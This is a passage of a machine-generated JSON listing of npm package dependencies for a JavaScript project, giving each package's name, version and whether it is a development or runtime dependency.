d":"development","optional":false},{"id":14013847986,"package_name":"@types","ecosystem":"npm","requirements":"rollup-plugin-visualizer@4.2.1","direct":false,"kind":"development","optional":false},{"id":14013847987,"package_name":"@types","ecosystem":"npm","requirements":"semver@7.3.12","direct":false,"kind":"development","optional":false},{"id":14013847988,"package_name":"@types","ecosystem":"npm","requirements":"semver@7.5.2","direct":false,"kind":"development","optional":false},{"id":14013847989,"package_name":"@types","ecosystem":"npm","requirements":"serve-index@1.9.1","direct":false,"kind":"development","optional":false},{"id":14013847990,"package_name":"@types","ecosystem":"npm","requirements":"serve-static@1.15.0","direct":false,"kind":"development","optional":false},{"id":14013847991,"package_name":"@types","ecosystem":"npm","requirements":"sinonjs__fake-timers@8.1.1","direct":false,"kind":"development","optional":false},{"id":14013847992,"package_name":"@types","ecosystem":"npm","requirements":"sizzle@2.3.3","direct":false,"kind":"development","optional":false},{"id":14013847993,"package_name":"@types","ecosystem":"npm","requirements":"sockjs@0.3.33","direct":false,"kind":"development","optional":false},{"id":14013847994,"package_name":"@types","ecosystem":"npm","requirements":"stack-utils@2.0.1","direct":false,"kind":"development","optional":false},{"id":14013847995,"package_name":"@types","ecosystem":"npm","requirements":"stylis@4.0.2","direct":false,"kind":"development","optional":false},{"id":14013847996,"package_name":"@types","ecosystem":"npm","requirements":"tough-cookie@4.0.2","direct":false,"kind":"development","optional":false},{"id":14013847997,"package_name":"@types","ecosystem":"npm","requirements":"trusted-types@2.0.2","direct":false,"kind":"development","optional":false},{"id":14013847998,"package_name":"@types","ecosystem":"npm","requirements":"unist@2.0.6","direct":false,"kind":"runtime","optional":false},{"id":14013847999,"package_name":"@types","ecosystem":"npm","requirements":"uuid@9.0.1","direct":false,"kind":"development","optional":false},{"id":14013848000,"package_name":"@types","ecosystem":"npm","requirements":"web-bluetooth@0.0.16","direct":false,"kind":"runtime","optional":false},{"id":14013848001,"package_name":"@types","ecosystem":"npm","requirements":"web-bluetooth@0.0.17","direct":false,"kind":"development","optional":false},{"id":14013848002,"package_name":"@types","ecosystem":"npm","requirements":"ws@8.5.3","direct":false,"kind":"development","optional":false},{"id":14013848003,"package_name":"@types","ecosystem":"npm","requirements":"ws@8.5.4","direct":false,"kind":"development","optional":false},{"id":14013848004,"package_name":"@types","ecosystem":"npm","requirements":"yargs-parser@21.0.0","direct":false,"kind":"development","optional":false},{"id":14013848005,"package_name":"@types","ecosystem":"npm","requirements":"yargs@17.0.13","direct":false,"kind":"development","optional":false},{"id":14013848006,"package_name":"@types","ecosystem":"npm","requirements":"yauzl@2.10.0","direct":false,"kind":"development","optional":false},{"id":14013848007,"package_name":"@typescript-eslint","ecosystem":"npm","requirements":"eslint-plugin@5.59.0(@typescript-eslint","direct":false,"kind":"development","optional":false},{"id":14013848008,"package_name":"@typescript-eslint","ecosystem":"npm","requirements":"eslint-plugin@6.7.2(@typescript-eslint","direct":false,"kind":"development","optional":false},{"id":14013848009,"package_name":"@typescript-eslint","ecosystem":"npm","requirements":"parser@5.59.0(eslint@8.39.0)(typescript@5.0.4)","direct":false,"kind":"development","optional":false},{"id":14013848010,"package_name":"@typescript-eslint","ecosystem":"npm","requirements":"parser@6.7.2(eslint@8.39.0)(typescript@5.1.3)","direct":false,"kind":"development","optional":false},{"id":14013848011,"package_name":"@typescript-eslint","ecosystem":"npm","requirements":"scope-manager@5.59.0","direct":false,"kind":"development","optional":false},{"id":14013848012,"package_name":"@typescript-eslint","ecosystem":"npm","requirements":"scope-manager@6.7.2","direct":false,"kind":"development","optional":false},{"id":14013848013,"package_name":"@typescript-eslint","ecosystem":"npm","requirements":"type-utils@5.59.0(eslint@8.39.0)(typescript@5.0.4)","direct":false,"kind":"development","optional":false},{"id":14013848014,"package_name":"@typescript-eslint","ecosystem":"npm","requirements":"type-utils@6.7.2(eslint@8.39.0)(typescript@5.1.3)","direct":false,"kind":"development","optional":false},{"id":14013848015,"package_name":"@typescript-eslint","ecosystem":"npm","requirements":"types@5.59.0","direct":false,"kind":"development","optional":false},{"id":14013848016,"package_name":"@typescript-eslint","ecosystem":"npm","requirements":"types@6.7.2","direct":false,"kind":"development","optional":false},{"id":14013848017,"package_name":"@typescript-eslint","ecosystem":"npm","requirements":"typescript-estree@5.59.0(typescript@5.0.4)","direct":false,"kind":"development","optional":false},{"id":14013848018,"package_name":"@typescript-eslint","ecosystem":"npm","requirements":"typescript-estree@5.59.0(typescript@5.1.3)","direct":false,"kind":"development","optional":false},{"id":14013848019,"package_name":"@typescript-eslint","ecosystem":"npm","requirements":"typescript-estree@6.7.2(typescript@5.1.3)","direct":false,"kind":"development","optional":false},{"id":14013848020,"package_name":"@typescript-eslint","ecosystem":"npm","requirements":"utils@5.59.0(eslint@8.39.0)(typescript@5.0.4)","direct":false,"kind":"development","optional":false},{"id":14013848021,"package_name":"@typescript-eslint","ecosystem":"npm","requirements":"utils@5.59.0(eslint@8.39.0)(typescript@5.1.3)","direct":false,"kind":"development","optional":false},{"id":14013848022,"package_name":"@typescript-eslint","ecosystem":"npm","requirements":"utils@6.7.2(eslint@8.39.0)(typescript@5.1.3)","direct":false,"kind":"development","optional":false},{"id":14013848023,"package_name":"@typescript-eslint","ecosystem":"npm","requirements":"visitor-keys@5.59.0","direct":false,"kind":"development","optional":false},{"id":14013848024,"package_name":"@typescript-eslint","ecosystem":"npm","requirements":"visitor-keys@6.7.2","direct":false,"kind":"development","optional":false},{"id":14013848025,"package_name":"@unocss","ecosystem":"npm","requirements":"astro@0.56.1(rollup@2.79.1)(vite@4.3.9)","direct":false,"kind":"development","optional":false},{"id":14013848026,"package_name":"@unocss","ecosystem":"npm","requirements":"cli@0.56.1(rollup@2.79.1)","direct":false,"kind":"development","optional":false},{"id":14013848027,"package_name":"@unocss","ecosystem":"npm","requirements":"config@0.56.1","direct":false,"kind":"development","optional":false},{"id":14013848028,"package_name":"@unocss","ecosystem":"npm","requirements":"core@0.56.1","direct":false,"kind":"development","optional":false},{"id":14013848029,"package_name":"@unocss","ecosystem":"npm","requirements":"extractor-arbitrary-variants@0.56.1","direct":false,"kind":"development","optional":false},{"id":14013848030,"package_name":"@unocss","ecosystem":"npm","requirements":"inspector@0.56.1","direct":false,"kind":"development","optional":false},{"id":14013848031,"package_name":"@unocss","ecosystem":"npm","requirements":"postcss@0.56.1(postcss@8.4.27)","direct":false,"kind":"development","optional":false},{"id":14013848032,"package_name":"@unocss","ecosystem":"npm","requirements":"preset-attributify@0.56.1","direct":false,"kind":"development","optional":false},{"id":14013848033,"package_name":"@unocss","ecosystem":"npm","requirements":"preset-icons@0.56.1","direct":false,"kind":"development","optional":false},{"id":14013848034,"package_name":"@unocss","ecosystem":"npm","requirements":"preset-mini@0.56.1","direct":false,"kind":"development","optional":false},{"id":14013848035,"package_name":"@unocss","ecosystem":"npm","requirements":"preset-tagify@0.56.1","direct":false,"kind":"development","optional":false},{"id":14013848036,"package_name":"@unocss","ecosystem":"npm","requirements":"preset-typography@0.56.1","direct":false,"kind":"development","optional":false},{"id":14013848037,"package_name":"@unocss","ecosystem":"npm","requirements":"preset-uno@0.56.1","direct":false,"kind":"development","optional":false},{"id":14013848038,"package_name":"@unocss","ecosystem":"npm","requirements":"preset-web-fonts@0.56.1","direct":false,"kind":"development","optional":false},{"id":14013848039,"package_name":"@unocss","ecosystem":"npm","requirements":"preset-wind@0.56.1","direct":false,"kind":"development","optional":false},{"id":14013848040,"package_name":"@unocss","ecosystem":"npm","requirements":"reset@0.56.1","direct":false,"kind":"development","optional":false},{"id":14013848041,"package_name":"@unocss","ecosystem":"npm","requirements":"rule-utils@0.56.1","direct":false,"kind":"development","optional":false},{"id":14013848042,"package_name":"@unocss","ecosystem":"npm","requirements":"scope@0.56.1","direct":false,"kind":"development","optional":false},{"id":14013848043,"package_name":"@unocss","ecosystem":"npm","requirements":"transformer-attributify-jsx-babel@0.56.1","direct":false,"kind":"development","optional":false},{"id":14013848044,"package_name":"@unocss","ecosystem":"npm","requirements":"transformer-attributify-jsx@0.56.1","direct":false,"kind":"development","optional":false},{"id":14013848045,"package_name":"@unocss","ecosystem":"npm","requirements":"transformer-compile-class@0.56.1","direct":false,"kind":"development","optional":false},{"id":14013848046,"package_name":"@unocss","ecosystem":"npm","requirements":"transformer-directives@0.56.1","direct":false,"kind":"development","optional":false},{"id":14013848047,"package_name":"@unocss","ecosystem":"npm","requirements":"transformer-variant-group@0.56.1","direct":false,"kind":"development","optional":false},{"id":14013848048,"package_name":"@unocss","ecosystem":"npm","requirements":"vite@0.56.1(rollup@2.79.1)(vite@4.3.9)","direct":false,"kind":"development","optional":false},{"id":14013848049,"package_name":"@vite-pwa","ecosystem":"npm","requirements":"vitepress@0.2.0(vite-plugin-pwa@0.16.0)","direct":false,"kind":"development","optional":false},{"id":14013848050,"package_name":"@vitejs","ecosystem":"npm","requirements":"plugin-vue@4.2.1(vite@4.3.9)(vue@3.3.4)","direct":false,"kind":"development","optional":false},{"id":14013848051,"package_name":"@vitejs","ecosystem":"npm","requirements":"plugin-vue@4.2.3(vite@4.4.9)(vue@3.3.4)","direct":false,"kind":"development","optional":false},{"id":14013848052,"package_name":"@vitest","ecosystem":"npm","requirements":"coverage-v8@0.34.0(vitest@0.34.0)","direct":false,"kind":"development","optional":false},{"id":14013848053,"package_name":"@vitest","ecosystem":"npm","requirements":"expect@0.34.0","direct":false,"kind":"development","optional":false},{"id":14013848054,"package_name":"@vitest","ecosystem":"npm","requirements":"runner@0.34.0","direct":false,"kind":"development","optional":false},{"id":14013848055,"package_name":"@vitest","ecosystem":"npm","requirements":"snapshot@0.34.0","direct":false,"kind":"development","optional":false},{"id":14013848056,"package_name":"@vitest","ecosystem":"npm","requirements":"spy@0.34.0","direct":false,"kind":"development","optional":false},{"id":14013848057,"package_name":"@vitest","ecosystem":"npm","requirements":"ui@0.34.0(vitest@0.34.0)","direct":false,"kind":"development","optional":false},{"id":14013848058,"package_name":"@vitest","ecosystem":"npm","requirements":"utils@0.34.0","direct":false,"kind":"development","optional":false},{"id":14013848059,"package_name":"@vue","ecosystem":"npm","requirements":"compat@3.3.4(vue@3.3.4)","direct":false,"kind":"runtime","optional":false},{"id":14013848060,"package_name":"@vue","ecosystem":"npm","requirements":"compiler-core@3.3.4","direct":false,"kind":"runtime","optional":false},{"id":14013848061,"package_name":"@vue","ecosystem":"npm","requirements":"compiler-dom@3.3.4","direct":false,"kind":"runtime","optional":false},{"id":14013848062,"package_name":"@vue","ecosystem":"npm","requirements":"compiler-sfc@3.3.4","direct":false,"kind":"runtime","optional":false},{"id":14013848063,"package_name":"@vue","ecosystem":"npm","requirements":"compiler-ssr@3.3.4","direct":false,"kind":"runtime","optional":false},{"id":14013848064,"package_name":"@vue","ecosystem":"npm","requirements":"devtools-api@6.5.0","direct":false,"kind":"runtime","optional":false},{"id":14013848066,"package_name":"@vue","ecosystem":"npm","requirements":"reactivity-transform@3.3.4","direct":false,"kind":"runtime","optional":false},{"id":14013848067,"package_name":"@vue","ecosystem":"npm","requirements":"reactivity@3.3.4","direct":false,"kind":"runtime","optional":false},{"id":14013848068,"package_name":"@vue","ecosystem":"npm","requirements":"runtime-core@3.3.4","direct":false,"kind":"runtime","optional":false},{"id":14013848069,"package_name":"@vue","ecosystem":"npm","requirements":"runtime-dom@3.3.4","direct":false,"kind":"runtime","optional":false},{"id":14013848071,"package_name":"@vue","ecosystem":"npm","requirements":"server-renderer@3.3.4(vue@3.3.4)","direct":false,"kind":"runtime","optional":false},{"id":14013848072,"package_name":"@vue","ecosystem":"npm","requirements":"shared@3.3.4","direct":false,"kind":"runtime","optional":false},{"id":14013848073,"package_name":"@vueuse","ecosystem":"npm","requirements":"core@10.1.0(vue@3.3.4)","direct":false,"kind":"runtime","optional":false},{"id":14013848074,"package_name":"@vueuse","ecosystem":"npm","requirements":"core@10.3.0(vue@3.3.4)","direct":false,"kind":"development","optional":false},{"id":14013848076,"package_name":"@vueuse","ecosystem":"npm","requirements":"core@10.4.1(vue@3.3.4)","direct":false,"kind":"development","optional":false},{"id":14013848077,"package_name":"@vueuse","ecosystem":"npm","requirements":"integrations@10.4.1(focus-trap@7.5.2)(vue@3.3.4)","direct":false,"kind":"development","optional":false},{"id":14013848078,"package_name":"@vueuse","ecosystem":"npm","requirements":"metadata@10.1.0","direct":false,"kind":"runtime","optional":false},{"id":14013848079,"package_name":"@vueuse","ecosystem":"npm","requirements":"metadata@10.3.0","direct":false,"kind":"development","optional":false},{"id":14013848080,"package_name":"@vueuse","ecosystem":"npm","requirements":"metadata@10.4.1","direct":false,"kind":"development","optional":false},{"id":14013848081,"package_name":"@vueuse","ecosystem":"npm","requirements":"shared@10.1.0(vue@3.3.4)","direct":false,"kind":"runtime","optional":false},{"id":14013848082,"package_name":"@vueuse","ecosystem":"npm","requirements":"shared@10.3.0(vue@3.3.4)","direct":false,"kind":"development","optional":false},{"id":14013848083,"package_name":"@vueuse","ecosystem":"npm","requirements":"shared@10.4.1(vue@3.3.4)","direct":false,"kind":"development","optional":false},{"id":14013848084,"package_name":"@wdio","ecosystem":"npm","requirements":"config@7.30.0(typescript@5.1.3)","direct":false,"kind":"development","optional":false},{"id":14013848139,"package_name":"@wdio","ecosystem":"npm","requirements":"logger@7.26.0","direct":false,"kind":"development","optional":false},{"id":14013848140,"package_name":"@wdio","ecosystem":"npm","requirements":"protocols@7.27.0","direct":false,"kind":"development","optional":false},{"id":14013848141,"package_name":"@wdio","ecosystem":"npm","requirements":"types@7.26.0(typescript@5.1.3)","direct":false,"kind":"development","optional":false},{"id":14013848142,"package_name":"@wdio","ecosystem":"npm","requirements":"utils@7.26.0(typescript@5.1.3)","direct":false,"kind":"development","optional":false},{"id":14013848143,"package_name":"@webassemblyjs","ecosystem":"npm","requirements":"ast@1.11.6","direct":false,"kind":"development","optional":false},{"id":14013848144,"package_name":"@webassemblyjs","ecosystem":"npm","requirements":"floating-point-hex-parser@1.11.6","direct":false,"kind":"development","optional":false},{"id":14013848145,"package_name":"@webassemblyjs","ecosystem":"npm","requirements":"helper-api-error@1.11.6","direct":false,"kind":"development","optional":false},{"id":14013848146,"package_name":"@webassemblyjs","ecosystem":"npm","requirements":"helper-buffer@1.11.6","direct":false,"kind":"development","optional":false},{"id":14013848147,"package_name":"@webassemblyjs","ecosystem":"npm","requirements":"helper-numbers@1.11.6","direct":false,"kind":"development","optional":false},{"id":14013848148,"package_name":"@webassemblyjs","ecosystem":"npm","requirements":"helper-wasm-bytecode@1.11.6","direct":false,"kind":"development","optional":false},{"id":14013848149,"package_name":"@webassemblyjs","ecosystem":"npm","requirements":"helper-wasm-section@1.11.6","direct":false,"kind":"development","optional":false},{"id":14013848150,"package_name":"@webassemblyjs","ecosystem":"npm","requirements":"ieee754@1.11.6","direct":false,"kind":"development","optional":false},{"id":14013848151,"package_name":"@webassemblyjs","ecosystem":"npm","requirements":"leb128@1.11.6","direct":false,"kind":"development","optional":false},{"id":14013848152,"package_name":"@webassemblyjs","ecosystem":"npm","requirements":"utf8@1.11.6","direct":false,"kind":"development","optional":false},{"id":14013848153,"package_name":"@webassemblyjs","ecosystem":"npm","requirements":"wasm-edit@1.11.6","direct":false,"kind":"development","optional":false},{"id":14013848154,"package_name":"@webassemblyjs","ecosystem":"npm","requirements":"wasm-gen@1.11.6","direct":false,"kind":"development","optional":false},{"id":14013848155,"package_name":"@webassemblyjs","ecosystem":"npm","requirements":"wasm-opt@1.11.6","direct":false,"kind":"development","optional":false},{"id":14013848156,"package_name":"@webassemblyjs","ecosystem":"npm","requirements":"wasm-parser@1.11.6","direct":false,"kind":"development","optional":false},{"id":14013848157,"package_name":"@webassemblyjs","ecosystem":"npm","requirements":"wast-printer@1.11.6","direct":false,"kind":"development","optional":false},{"id":14013848158,"package_name":"@webpack-cli","ecosystem":"npm","requirements":"configtest@1.2.0(webpack-cli@4.10.0)(webpack@5.88.2)","direct":false,"kind":"development","optional":false},{"id":14013848159,"package_name":"@webpack-cli","ecosystem":"npm","requirements":"info@1.5.0(webpack-cli@4.10.0)","direct":false,"kind":"development","optional":false},{"id":14013848160,"package_name":"@webpack-cli","ecosystem":"npm","requirements":"serve@1.7.0(webpack-cli@4.10.0)(webpack-dev-server@4.11.1)","direct":false,"kind":"development","optional":false},{"id":14013848161,"package_name":"@xtuc","ecosystem":"npm","requirements":"ieee754@1.2.0","direct":false,"kind":"development","optional":false},{"id":14013848162,"package_name":"@xtuc","ecosystem":"npm","requirements":"long@4.2.2","direct":false,"kind":"development","optional":false},{"id":14013848163,"package_name":"@zenuml","ecosystem":"npm","requirements":"core@3.0.6(ts-node@10.9.1)","direct":false,"kind":"runtime","optional":false},{"id":14013848164,"package_name":"JSONSelect@0.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848191,"package_name":"JSONStream@1.3.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848192,"package_name":"JSV@4.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848277,"package_name":"abab@2.0.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848279,"package_name":"abort-controller@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013848281,"package_name":"abstract-logging@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848282,"package_name":"accepts@1.3.8","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848283,"package_name":"acorn-globals@6.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848284,"package_name":"acorn-import-assertions@1.9.0(acorn@8.10.0)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848285,"package_name":"acorn-jsx@5.3.2(acorn@8.10.0)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848286,"package_name":"acorn-walk@7.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848287,"package_name":"acorn-walk@8.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013848288,"package_name":"acorn@7.4.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848289,"package_name":"acorn@8.10.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848290,"package_name":"acorn@8.8.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013848291,"package_name":"agent-base@6.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848292,"package_name":"aggregate-error@3.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848293,"package_name":"aggregate-error@4.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848294,"package_name":"ajv-formats@2.1.1(ajv@8.12.0)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848295,"package_name":"ajv-keywords@3.5.2(ajv@6.12.6)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848296,"package_name":"ajv-keywords@5.1.0(ajv@8.12.0)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848297,"package_name":"ajv@6.12.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848298,"package_name":"ajv@8.12.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848299,"package_name":"algoliasearch@4.14.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848300,"package_name":"algoliasearch@4.19.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848301,"package_name":"amdefine@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848302,"package_name":"ansi-align@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848303,"package_name":"ansi-colors@4.1.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848304,"package_name":"ansi-escapes@4.3.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848305,"package_name":"ansi-html-community@0.0.8","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848306,"package_name":"ansi-regex@2.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848307,"package_name":"ansi-regex@5.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848308,"package_name":"ansi-regex@6.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848309,"package_name":"ansi-sequence-parser@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848310,"package_name":"ansi-styles@2.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848311,"package_name":"ansi-styles@3.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848312,"package_name":"ansi-styles@4.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848313,"package_name":"ansi-styles@5.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848314,"package_name":"ansi-styles@6.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848315,"package_name":"antlr4@4.11.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013848385,"package_name":"any-promise@1.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013848386,"package_name":"anymatch@3.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013848387,"package_name":"app-path@3.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848433,"package_name":"appdata-path@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848442,"package_name":"append-transform@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848443,"package_name":"arch@2.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848444,"package_name":"archy@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848445,"package_name":"are-docs-informative@0.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848446,"package_name":"arg@4.1.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013848447,"package_name":"arg@5.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013848448,"package_name":"argparse@1.0.10","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848449,"package_name":"argparse@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848450,"package_name":"array-flatten@1.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848451,"package_name":"array-flatten@2.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848452,"package_name":"array-ify@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848453,"package_name":"array-timsort@1.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848454,"package_name":"array-union@2.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848455,"package_name":"arrify@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848456,"package_name":"arrify@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848457,"package_name":"asn1@0.2.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848458,"package_name":"assert-plus@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848459,"package_name":"assertion-error@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848460,"package_name":"astral-regex@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848461,"package_name":"async@3.2.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848462,"package_name":"asynckit@0.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848463,"package_name":"at-least-node@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848464,"package_name":"atomic-sleep@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013848465,"package_name":"available-typed-arrays@1.0.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848466,"package_name":"avvio@7.2.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848480,"package_name":"aws-sign2@0.7.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848481,"package_name":"aws4@1.11.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848482,"package_name":"axios@0.27.2(debug@4.3.4)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848483,"package_name":"babel-jest@29.5.0(@babel","ecosystem":"npm","requirements":"core@7.12.3)","direct":false,"kind":"development","optional":false},{"id":14013848484,"package_name":"babel-loader@9.1.2(@babel","ecosystem":"npm","requirements":"core@7.12.3)(webpack@5.88.2)","direct":false,"kind":"development","optional":false},{"id":14013848485,"package_name":"babel-plugin-istanbul@6.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848486,"package_name":"babel-plugin-jest-hoist@29.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848487,"package_name":"babel-plugin-polyfill-corejs2@0.3.3(@babel","ecosystem":"npm","requirements":"core@7.12.3)","direct":false,"kind":"development","optional":false},{"id":14013848488,"package_name":"babel-plugin-polyfill-corejs3@0.6.0(@babel","ecosystem":"npm","requirements":"core@7.12.3)","direct":false,"kind":"development","optional":false},{"id":14013848489,"package_name":"babel-plugin-polyfill-regenerator@0.4.1(@babel","ecosystem":"npm","requirements":"core@7.12.3)","direct":false,"kind":"development","optional":false},{"id":14013848490,"package_name":"babel-preset-current-node-syntax@1.0.1(@babel","ecosystem":"npm","requirements":"core@7.12.3)","direct":false,"kind":"development","optional":false},{"id":14013848491,"package_name":"babel-preset-jest@29.5.0(@babel","ecosystem":"npm","requirements":"core@7.12.3)","direct":false,"kind":"development","optional":false},{"id":14013848492,"package_name":"bail@2.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848493,"package_name":"balanced-match@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013848494,"package_name":"base64-js@1.5.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013848495,"package_name":"batch@0.6.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848496,"package_name":"bcrypt-pbkdf@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848497,"package_name":"big.js@6.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848523,"package_name":"binary-extensions@2.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013848524,"package_name":"binary-searching@2.0.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848670,"package_name":"binary@0.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848671,"package_name":"blob-util@2.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848672,"package_name":"bluebird@3.7.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848673,"package_name":"bluebird@3.7.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848674,"package_name":"bmpimagejs@1.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848690,"package_name":"body-parser@1.20.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848691,"package_name":"body-scroll-lock@4.0.0-beta.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848692,"package_name":"bonjour-service@1.0.14","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848704,"package_name":"boxen@5.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848705,"package_name":"brace-expansion@1.1.11","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013848706,"package_name":"brace-expansion@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848707,"package_name":"braces@3.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":14013848708,"package_name":"browser-process-hrtime@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848709,"package_name":"browserslist@4.21.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848710,"package_name":"bser@2.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":14013848711,"package_name":"buffer-crc32@0.2.13","ecosystem":"npm","requirements":null,"direct":false,"